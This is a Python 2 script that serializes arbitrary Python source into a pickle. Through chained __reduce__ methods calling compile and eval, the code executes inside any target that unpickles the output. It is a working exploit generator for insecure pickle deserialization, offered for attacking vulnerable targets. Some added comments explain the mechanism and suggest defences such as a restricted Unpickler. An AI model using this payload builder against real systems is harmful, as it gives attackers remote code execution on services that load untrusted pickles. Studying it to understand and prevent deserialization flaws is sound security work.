Script to serialize arbitrary Python code and exploit a vulnerable pickle deserialization
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
__author__ = "Foo-Manroot"
__license__ = "GPL"
__version__ = "1.0"
"""
Little script to serialize custom code with pickle to exploit a vulnerable target.
Copyright © 2018 Foo-Manroot
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import cPickle as pickle
class Compiler (object):
    """
    Additional class to compile the provided code, as pickle can't serialize
    code objects

    Only the source string is stored on the instance; ``__reduce__`` instructs
    pickle to rebuild the object by calling ``compile`` on that string, so the
    code object is created on the *unpickling* side, at load time.
    """
    def __init__ (self, code):
        # Python source text; compiled only when the pickle is loaded.
        self.code = code
    def __reduce__ (self):
        # pickle protocol hook: (callable, args). The loader reconstructs the
        # object by calling compile(self.code, '<string>', 'exec'). Any callable
        # returned here executes during unpickling, which is why pickle.loads on
        # data from an untrusted source is unsafe.
        return ( compile, (self.code, '<string>', 'exec') )
class Exploit (object):
    """
    Main class to evaluate code at unserialization

    On load, pickle first rebuilds the nested ``Compiler`` (producing a code
    object, see ``Compiler.__reduce__``) and then passes it to ``eval``, so the
    serialized source runs inside the process that called ``pickle.loads``.

    Defensive notes: treat any pickle received from outside the trust boundary
    as code, not data. Prefer a data-only format (e.g. JSON) or authenticate the
    payload (signature/MAC) before loading; where unpickling is unavoidable, a
    custom Unpickler whose ``find_class`` only allows an explicit list of names
    rejects the global lookups of builtins such as ``compile``/``eval`` that this
    kind of payload depends on.
    """
    def __init__ (self, code):
        # Python source text to be evaluated on the unpickling side.
        self.code = code
    def __reduce__ (self):
        # Reconstruction recipe: eval(<code object from Compiler>). The Compiler
        # instance is itself pickled via its own __reduce__, so the argument
        # becomes a compiled code object before eval is applied.
        return ( eval, (Compiler (self.code), ) )
if __name__ == "__main__":
    # CLI entry point: with no argument, or "-h"/"--help", print the usage text
    # and exit with status 1; otherwise read FILE and write the pickle to stdout.
    if (len (sys.argv) <= 1
        or
        sys.argv [1].lower () == "-h"
        or
        sys.argv [1].lower () == "--help"
        ):
        print ("Script to serialize with pickle a code to exploit a vulnerable target")
        print ("Foo-Manroot - 2018\n")
        print ("Usage:")
        print (sys.argv [0] + " [-h | --help | FILE]\n")
        print ("The available options are:")
        print ("\tFILE")
        print ("\t\tA file with the Python source code to be serialized")
        print ("\t-h")
        print ("\t--help")
        print ("\t\tShows this help message")
        exit (1)
    # NOTE(review): the file object is never explicitly closed (no `with` block);
    # it is released only when the interpreter exits.
    code = open (sys.argv [1], "r").read ()
    # This is the only thing being printed, so it can be piped for the exploitation
    # (any other output would corrupt the serialized stream on stdout).
    print (pickle.dumps (Exploit (code)))